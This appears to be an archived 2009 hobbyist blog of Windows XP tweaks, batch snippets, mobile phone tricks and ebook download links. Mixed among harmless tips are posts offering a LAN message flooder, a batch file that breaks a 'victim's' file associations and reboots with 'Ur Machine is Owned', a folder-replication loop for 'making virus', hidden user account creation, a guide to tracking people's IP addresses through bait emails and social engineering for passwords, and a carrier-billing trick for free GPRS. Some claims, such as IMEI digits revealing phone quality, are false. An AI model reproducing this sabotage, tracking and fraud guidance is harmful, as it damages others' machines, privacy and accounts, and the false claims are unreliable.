Tuesday, March 31, 2009

Identifying Malicious code through Reverse Engineering

For Download: Click Here

Dreamweaver 8 for Dummies ebook

For Download: Click Here.

The Art of Intrusion ebook

For Download: Click Here.
For more books goto Books section under categories.

The Complete Idiot's Guide to Upgrading and Repairing PCs (5th Edition) book

For Download: Click Here.
For more books visit Books section in categories.

Beginning Programming All-In-One Desk Reference For Dummies book

For Download: Click Here.

Application Development Using VB & .NET ebook

This book is for those who want do Application Development Using VB & .NET .
For Download: Click Here.

Data Warehousing for Dummies book

For Download: Click Here.

Pro Ubuntu Server Administration book

For Download: Click Here.

Stealing the Network ebook

For Download: Click Here.
For more books goto Books section in Categories.

Window 7 Pocket Guide

For Download: Click Here.

Wine for Dummies book

For Download: Click Here.

Windows Forms Programming in Visual Basic .NET 2004 Book

For Download: Click Here.
For more books visit Books section in categories.

Laptops for Dummies book

For Download: Click Here.
For more books visit Books section in categories menu.

Different Genetics of dog book

This book contains information about genetics of Dog. For download: Click Here.

XML for dummies 4th edition book

For Download: Click Here.

Friday, March 27, 2009

Create shortcut of shutdown and Restart in Xp

U can create a shortcut of shutdown and restart in window xp. No need to goto start button and do all that long stuff.

So here is way to create shutdown button. Open notepad and type the following code.

shutdown -s -t 0

here 0 is zero it is the time in seconds after which machine shutsdown. -s means shutdown.
Now save as this notepad with name shutdown.bat . thats all.

Now here is way to create shortcut to restart or reboot. open notepad and type the following code:

shutdown -r -t 0

here -r means restart. Again save as this notepad as restart.bat thats all. Now when ever u ned to shutdown/restart ur machine click this files thats all.

Now i thought to improve this code so that it even deletes all the temporary files & temporary internet files too before shutdown or restart. so just type following code in notepad:

cd C:\DOCUME~1\crypto\LOCALS~1\Temp
del /q *.*
cd C:\Documents and Settings\crypto\Local Settings\Temporary Internet Files
del /q /f *.*

NOTE: here in code where i have written crypto u have to replace it with ur Username. ok
Similarily by replacing -s with -r u can create it for reboot.

Tested personally.

How to Auto End Tasks to Enable a Proper Shutdown

This reg file automatically ends tasks and timeouts that prevent programs from shutting down and clears the Paging File on Exit.
Copy the following (everything in the box) into notepad:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]


Now Save the file as shutdown.reg
Double click the file to import into your registry.
It maybe possible that ur Antivirus detects this script as malicious but it is not harmful anyway.

Source: Internet

Thursday, March 26, 2009

Realmedia Trick how to play many videos continuously

You may find this helpful if you download hundreds of short episodes in rm format and tired of double-click to open next files.

Very easy. Use notepad to open a new file, type this inside:
file://link to file1
file://link to file2
(type as many as you want)
Close file. Rename it to FileName.rm

Then you`re done!!!!

I put my playlist file here: C:\Movies\7VNR
And the movie files are in C:\Movies\7VNR\DragonBall

Then inside my playlist file I`ll have something like this:


Source: Internet

How to Increase Booting speed of ur Window Xp

Now here is way to increase the booting speed of ur windows xp. just follow the below steps with utmost care.

Follow the following steps:
  1. Open notepad.exe, type "del c:\windows\prefetch\ntosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:\
  2. From the Start menu, select "Run..." & type "gpedit.msc".
  3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
  4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
  5. Click "OK", "Apply" & "OK" once again to exit.
  6. From the Start menu, select "Run..." & type "devmgmt.msc"
  7. Double click on "IDE ATA/ATAPI controllers"
  8. Right click on "Primary IDE Channel" and select "Properties".
  9. Select the "Advanced Settings" tab then on the device or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
  10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
  11. Reboot your machine.
Warning: Use at ur own risk

Source: Internet

How to repair a Corrupted Internet Explorer.

So there maybe a chance i'll call an unfortunate chance that ur Internet explorer gets corrupted by some virus or spyware or anything like that. Due to this ur IE doesnt works but other internet applications work like antivirus updates as without any error or u watch videos by using players like Real player etc. So now here is way to cure the IE.
Follow as below:
Start the Registry Editor by typing regedit from the Run box.

Now navigate to following registry entry:

Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Active Setup \ Installed Components \ {89820200-ECBD-11cf-8B85-00AA005B4383}

right-click the “IsInstalled value.”

Click Modify and change value from 1 to 0.

So now exit registry editor and download new IE from Microsoft's site and install it.
Click Here to download.
Hope it works for u.

If messing with the registry and something goes horribly wrong, you can use “Last Known Good Configuration (select from F8 Safe Mode)” or a Restore Point to get back to where you were before, with your settings. Then you can try again, this time taking care to watch the portion of the registry you are changing.

Source: Internet

Accessing Blocked sites at colleges/schools/offices

There is lot of problems now a days with net admin they keep blocking some sites due to some reasons. But still if u need to access those restricted sites then here is a lot of ways. However they may work according to the security implemented by ur Net admin.
U can several proxies available to access those sites. I'll provide u list of proxy sites just use one of them and u are through. Following is list :


sometimes in case of Kproxy u'll again get error about access denied so then u have to do the following. just when u tried to open any site using kproxy just goto to address bar there u'll notice the address begins with http:// so now just put letter ' s ' after http so that it becomes

Rest of list u can get here.

However i reccommed u all that DONOT open any sensitive sites like checking ur mails ( gmail, yahoo, hotmail, etc.) via proxies because the connection is not always secure so just surf dont try doing any sensitive works like online shopping, online banking etc. using proxies.

Learn a new, easy programming language.

This post is just for those who are not able to understand or dislike complicated languages like c, c++ but still wanna do some programming. So this language is just for them. It is known as Autoit script. This language is very easy to learn , understand and to implement. The syntax of commands are too easy that u can practise this language at ur own. Moreover the software of this programming language is free too. You can create ur own small applications with this tool and moreover this is fully functional with windows enviornment.
For more details
Click Here.

Changing Window scan disk countdown

U might have seen sometimes when u turn on ur machine, light blue screen comes and it displays a message that following drive needs to be checked for errors and countdown timer of 10 seconds begins if u cancel within this time the checking of disk cancels else it continues. Now u can even change this value of this countdown. Do as following to do so:
Open registry ie. Goto Run type regedit hit enter

now navigate to following key :

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AutoChkTimeOut

Now here u can change the time from 10 seconds to ur own choice like 86400 seconds that is one day.

Source : Internet

How to create ur own screen saver in windows

First of all u need two tools. Format factory and WG Screen Saver creator. Download Format factory Click Here and for WG Screen saver Click Here.

Now install these softwares. first open Format factory and on left pane then just click on a SWF file format. U can add any video that u like by clicking on add button on right side. convert the file to swf format by clicking start button thats all save it. ok now
open Wg screen saver creator now add file that u recently created .swf format.
click preview screen saver u could see the preview u can also change background color and many more things. Now click create button to finish the screen saver.
Now change the screen saver and apply one that u created.
Xp user right click desktop goto properties then goto screen saver tab and select ur screen saver. Vista users right click ur desktop goto personalize then goto screen saver and then choose the screen saver.
Hope u can create now ur own screen savers.

Source: www.tinkernut.com

Wednesday, March 25, 2009

How to rename Start button in Window xp

First method that requires little hard work and in this all is done by u so we are going to modify explorer.exe file using tool known as Resource Hacker. Click Here to download.
The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe
The category we are going to be using is String Table. Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable as shown in Fig. 2. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.
There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry.

Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file. See Fig. 04. Save the newly named file to C:\Windows. i used crypto.exe
Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. u can access registry by going to Run type regedit hit enter.
Navigate to following key : HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

In the right pane (above figure), double click the Shell entry to open the Edit String dialog box as shown in Fig. below In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.,
Now just close all windows rboot ur system to see changes.

Method 2.

Just use a simple utility StartBtn Renamer to do this all.
For Download Click Here

Source: Internet

How to create Hidden user account in XP

Here is a way by which u can create a hidden User account in windows XP. u must be admin to do so. Just follow the following steps .
First goto Control Panel then goto user accounts now create a new user give it any desired name.
Now goto to Run type regedit and hit enter.
Now navigate to following path in registry :

Now on right pane right click anywhere and create a new Dword value give it a name that u have given to new user account u have just created. eg. if i created a account crypto then i'll create a new dword value and give it name crypto.
And the value filed must have value 0 (zero) 0 means account is hidden and 1 means account is visible.
now just exit registry. Now logoff the curent user and on login screen u wont see the account u just created.
Now in order to login to hidden account just press twice Cltr+Alt+Del keys now u will see a login box just type the user name and password if any and u'll be able to login to user hidden account.
This trick may or maynot work according to ur Xp operating system

Monday, March 23, 2009

LAN flodder code snippet

Here is a batch code that can be used to flood ur LAN. The only requirement is that the messenger service must be enabled in ur LAN. U can enable it by following steps but u must be admin.

Go to to run type compmgmt.msc hit enter

now on left pane double click on Services and Applications

on right pane double click on Services

then on right pane double click on Messenger

in Start up type choose Automatic then click start and exit.

So now here is the code of flodder type following in notepad:

net send * Your message here

the command is net then space then send then space then * then space then ur message.
now save as this notepad with name flodder.bat double click it to execute. Where i have written Your message u can replace that with what message u wanna sent t flood.

Sunday, March 22, 2009

How to connect two PC with USB cable.

Connecting two PC with USB cable is possible. The cable has two usb ports at it ends. But thats not enough. NEVER use A cable with two usb ports at its end to connect ur PC. but the cable that connects the pc is called bridged cable it has 2 usb ports at its ends and a small chip at center that is bridge. It is specially made for this.
For more details Click Here

Friday, March 20, 2009

Friday, March 13, 2009

Create ur own HTTP file server for free

Website named as http://www.rejetto.com/ provides a free software that can be used to create ur own HTTP file server. It has following features:
You can use HFS (HTTP File Server) to send and receive files.

It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.

It also differs from classic web servers because
it's very easy to use and runs "right out-of-the box".

Access your remote files, over the network.

Just download the software and click it to start. you can download it from here. Click Here

For more information and how to use Click Here

Source : Internet

LAN chatting batch code snippet

Here is batch file code that will enable u to chat with others on LAN.
U need administrative privelieges for it on ur machine. Now u all need is the ip address of person with whom u wanna chat. Just type the following code in notepad and save it as chat.bat
double click it to start chatting.

@echo off
set /p n=User:
set /p m=Message:
net send %n% %m%
Goto P

Now u get this on screen

now type the ip of the person then hit enter. now u'll see some thing like this on screen
User: IP_Address or computer name with whom u want to chat

now type the message and hit enter thats all. If network connection is ok then u can start chatting.

How to remove NTDETEC1.EXE virus in windows

There maybe a chance or unfortunate that ur machine gets infected with NTDETEC1.EXE virus.
This virus will Disable ur Task manager, Registry as well as folder option cant be accesed to view the hidden folders and files.
This virus and its related files are hidden and cant be deleted from explorer bcecause folder option is disabled too due to it.
The files related to this virus are as below:

So now here is the way to remove this virus.
first type following commands one by one in Command prompt and execute them by pressing enter.
taskkill /im cmrss.exe
taskkill /im ntdetec1.exe
taskkill /im shell32.exe

Now type cd\ in command prompt and hit enter.
Now type
attrib ntdetec1 -s -h -r /s /d command and hit enter. This will make the folders visible now simply Shift-Delete the above listed files. Or simple type the following code in notepad and save it with any name but with extension .bat then double click the batch file it will do the above job.

@echo off
taskkill /im cmrss.exe
taskkill /im ntdetec1.exe
taskkill /im shell32.exe

attrib ntdetec1 -s -h -r /s /d
rmdir /s /q /f ntdetec1.exe
rmdir /s /q /f shell32.exe
rmdir /s /q /f cmrss.exe

Now open ur Registry by typing regedit at run and hit enter, now delete the following entry
in registry if it is present
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\ Run\"winlogon" = "C:\ntdetec1\run.exe"

Extension altering Batch Code snippet

What is meant by Extension changer ?

As in windows all the image file are by default opened by
"Windows Picture and Fax Viewer" but this code will change it to open with some other application as you wish.
eg: .txt file is opened by notepad but the code will change it to get opened with
"Windows Picture and Fax Viewer"now as the .txt file can't be opened with "Windows Picture and Fax Viewer" so in this way u can disable the opening of .txt file of victim similarily u can alter the following code to do what changes u want to make on victim's machine. Just copy the code below in notepad and save it with any name but Extension should be .bat
The code is as below:

@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
shutdown -r -t 10 -c Ur Machine is Owned..

This code will make .txt fil to open with
Windows Picture and Fax Viewer.
.exe file will open with Web browser, .jpeg file will open with vlc player etc.
Infact the files will not be able to open as applications will not be supported with the format that they will have.

Warning : Use at ur own risk

Folder Replication Batch file code snipppet

So here is the code that will create folder in a folder and so on. This batch file code will create folder in a folder and keep doing that continuously. U can also use this code while making virus.
Just type the code below in a notepad and save it with any name but the extension must be .bat
eg. crypto.bat
Code is as below :

md Virus
cd Virus
goto loop

Have fun.

Source : Internet

Sunday, March 8, 2009

How to increase downloading speed of utorrent

So here are few ways to enhanch the downloading speed of utorrent (my best)

When ever u click the torrent file for downloading let it start downloading now just open utorrent
right click the torrent that is downloading then goto Bandwidth Allocation select it to High.
Now again right click the torrent and goto Bandwidth allocation then goto Downloading limit and select Unlimited. Similarily repeat the above steps and goto Uploading speed and select it to Least value as possible. like 5kb/s or 3kb/s as low as possible.( i use 1kb/s)
Now after completing this again right click the torrent goto properties then now at below in Other settings untick Initial seeding, tick Peer Exchange option , tick Enable DTH, tick local peer discovery.
Now again go back to main screen of utorrent. Now goto Option in menu bar then goto Prefrences (shortcut is ctrl+p)
then goto Advanced on left pane now on right pane search for net.max_halfopen select it and change its value from 8 to some value between 80 - 150. ( i use 80) save the changes.
Now again goto Option in menu bar then goto Prefrences now goto connection on right pane
Tick the boxes saying Add Window Firewall exception, Enable UPnP porting mapping, Enable NAT-PMP port mapping.
One more thing keep in mind that whenever a new version is available update ur utorrent. Getting the latest version of Utorrent client might help you to fix slow download speed by bypassing the technology using some hacks like protocol encryption. You need to do a trial and error to determine which version works best for you.
Here is list of trackers that u can add to ur torrents. Right-Click on the torrent which is very slow and go to Properties. Then under the General tab, at below side there will be tab Trackers you’ll notice a list of existing trackers for the selected torrent. Right click and select Add tracker & then paste the list given below as it is with empty line between 2 links.


































This may increase the downloading speed to some extent depending upon ur connection.

Source : Internet

How to get Ip address of a person

There are several ways as following :

1. If you have a web server hosted someplace where you can see its logs then it's very easy to send someone a URL of an image or any webpage hosted on your web server ( whenever this page is visited the web server keeps a log of who visited that page (IP address, time, browser, OS ... and lots of more info) where you can check later to collect IP addresses.

2. Sometimes people get freaked out from addresses that have ip addresses in the URL so having your webserver with a domain name would really help the person you sent the URL to press on the link eg. (www.mywebsite.com/veryfunnyimage.jpg)

3. Some people don't open links to unknown sites. So here comes the cool trick. you can embbed the image in a post of yours in a known site that allows HTML tags with image sources like < src =" (your">

4. Some people don't open links at all!! for these people use this trick. Send an email to the target that looks important to him/her (depending on the target actually and what's important to him/her). This email is in HTML format and contains a tag that links to an image on my webserver (probably a white image not to attract attention). Now upon merely opening the email, my webserver is invoked and a log entry is saved about the persons current IP address.

Note that this method only works if the email client allows images to be displayed (gmail disable that by default)

5. A more faster approach is IM. If you have the IM of the target, then it's possible that you try to send him/her a file (a picture or something). upon sending the file, a direct connection is established between you and the target. with a simple connection monitoring application (e.g.netstat command in windows), you can know the Ip address.

6. In MSN messenger, if u don't have the display picture of the person you're talking to, the messenger will try to download it by default. this cause the the MSN to open a direct connection. Using a sniffing tool like wireshark will allow you to know the IP of the remote person. So basically if you don't have his display picture and you opened the chat window you'll get your log entry. You can either convince the target to change his/her display picture or you can remove the your local directory that caches the display pictures for all contacts (located in application data folder for the msn) to force the messenger to redownload the picture.

7. Use Pidgin Software for chatting it has option to get ip of other person.

8. U can also get ip from email of person for that u need to look carefully in header of mail for ip
There you can find all servers and also the client host this email passed through. The first server in header is mostly the host of your own email, then follow some email gateways and the last one is the client that sent the message. but the problem is that most people use web mail these days.. and web mail usually removes the originating ip from the header. or puts the ip of the web server on which the web mail is hosted.

9. Try social engineering { Social engineering means trying to elicit information from people by asking them questions in such a way that they are unaware about the concequences/results of providing information to u. like if u wanna hack password of someones email id then try social engineering with the victim. ask questions to victim to elicit personal information of victim like D.O.B, pets name. girlfriend's/boyfriend's name etc. all that stuff that u think can be its password}
like asking the person his/her ip in kewl cunning way by saying that u are a technician and u need ip for solving some network problem or say something similar like that.

Source : Internet

Saturday, March 7, 2009

Cracking Memory card passwords

There are types of methods for recovering the password of your memory card with the help of nokia phone. For Nokia s60 1st and 2nd edition phones.
1. First Install
FExplorer in your phone memory.
2. Got to drive C: you will find a file called
3. Send it to your pc directly and open it in notepad or rename the file.

4. At the end of the file you will find your password. For Nokia S60 3rd Phones, Nokia N-Series and Nokia E-Series. Link for FExplorer : Click here

Source : Internet

Connect internet through GPRS using China mobile

On ur pc
open control panel -> phone and modem options -> modems -> select your chinese phone modem -> properties -> advanced -> extra settings - in extra initialization command type this -> AT+cgdcont=1,"IP","Your service providers APN","",0,0

it will connect to internet after you make new connection from network connections and choose phone dialing no. as *99***1#, no password or username is needed, leave blank.

Source : Internet

China mobile's PC suite

Download :


China Mobile USB drivers

If u have problem in getting china mobile usb drivers then here is the link for u :


Free GPRS of Idea users

This is the new trick for the user of idea cellular.
cell phone or pc/laptop. U must have the following:
1... you must have no connection !
2... you must not have any active plans !
3... you must have prepaid connections !( Postpaid user dont use this trick it will enhanch ur bill)
4...you must have S60 phone(for certain s40 devices it will work)
Now comes the actual procedure:From your idea cell phone type GP13 and send it to 4444.
now you will receive that your GP13 pack will be activated within 24 hours. now wait for
12 to 16 hours. now send the same sms to 4444. you will receive that your request has been already registered. now again after 24 hours you will find that your GP13 pack hasbeen activated...!!!
BUT thats not a trick...yes because you have been have been charged 13 rs because of activation of GP13 real trick starts now. After successfull activation of GP13 pack just send NOGP13 to 4444.
(4444 No is free of charge) you will receive that your GP13 pack will be deactivated within 24 hours. now after just 10 to 12 hours of sending dectivation sms again send GP13 to 4444..now you have completed your all steps to get free internet. its because due to last activation sms after deactivation smssystem will be unable to take decision what to do !! now after some time of sending sms for activation just restart your device/cell. you are able to surf free..but note that if you are using cell phone than use opera mini web browser and if you are using pc/laptop than use smart web browser or opera 9.27.if you wish to use proxy for your opera than you must have to use the proxy given below.....
1.i.p.Adderss: :1080(common for all)

Source : Internet

Check ur mobile's quality

Type *#06# and press DIAL [green button]
Now you will see the IMEI code of ur mobile phone.
eg: 154526089564585
Now,IF the Seventh & Eighth digit numbers are 02 or 20 that means it was assembled in Emirates, which is very Bad quality.

IF the Seventh & Eighth digit numbers are 08 or 80 that means it’s manufactured in Germany which is not bad

IF the Seventh & Eighth digit numbers are 01 or 10 that means it’s manufactured in Finland which is Good

IF the Seventh & Eighth digit numbers are 00 that means it was manufactured in original factory which is the best Mobile Quality

…IF the Seventh & Eighth digit numbers are 13 that means it was Assembled on Azerbaijan which is very Bad quality and very dangerous for health !!!

Source : Internet

Send free MMS in Airtel

May or may not work it is not guranteed
Go toMessage Setting - MMS Setting
& than change APN Address or I.PSERVER Address from airtelmms.com to airtelfun.com.
If MMS sending is failed than dial this CODE - *#1921135518#
dialing this will make sending free MMS.

Try ar ur own risk.

Source : Internet

Hide ur Phone number while calling

Most of you want to call someone while hiding your own phone number identity..??

so i am publishing the trick for hiding your phone number while calling.

If you want to hide your phone number when calling, put one of these codes in front of the number that you are going to call.
*#30# , *31#

eg. *#330#9855812345

If u want to show the number then add any of the following code in front of number u r calling to:

*#31# , #31#

Note : Trick may work depending upon ur operator.

Source : Internet

To check if ur Antivirus is working or not

Want to check wether your antivirus is running properly or not
Perform the following
Open a notepad and type the following :

Save it as eicar.com , The Anti-Virus should stop you from saving this file(if it does that means its working).
Don't worry about it. European Institute for Computer Anti-virus Research (EICAR) have got people to program Anti-Virus to recognize this as a threat (even tough it's completely harmless)...

If the Antivirus doesn't abort the saving of eicar.com then ur antivirus is not working properly.

Source : Internet

Monday, March 2, 2009

How to download Youtube videos

There are several ways to download youtube videos.

1. You can use several sites like www.videodownloadx.com , www.keepveed.com, etc.
Just copy the URL of the video u want to download then goto to the above sites just paste the url there then u'll get option to download video in .flv format u can use flv player to view them.

2. Intall a Internet download manager it has option to download the video.

3. 1. Whenever you are watching video on YouTube, goto the address bar at the top of your browser.
Notice the URL is something like this: http://www.youtube.com/watch?v=VKMm4XBsqhk

2. Just in front of the youtube.com domain name, insert the word kiss
Eg. http://www.kissyoutube.com/watch?v=VKMm4XBsqhk

3. Press the 'Enter' key and it will bring you to this website. Click on the download link provided to save the video to your computer. For more click here

Source : Internet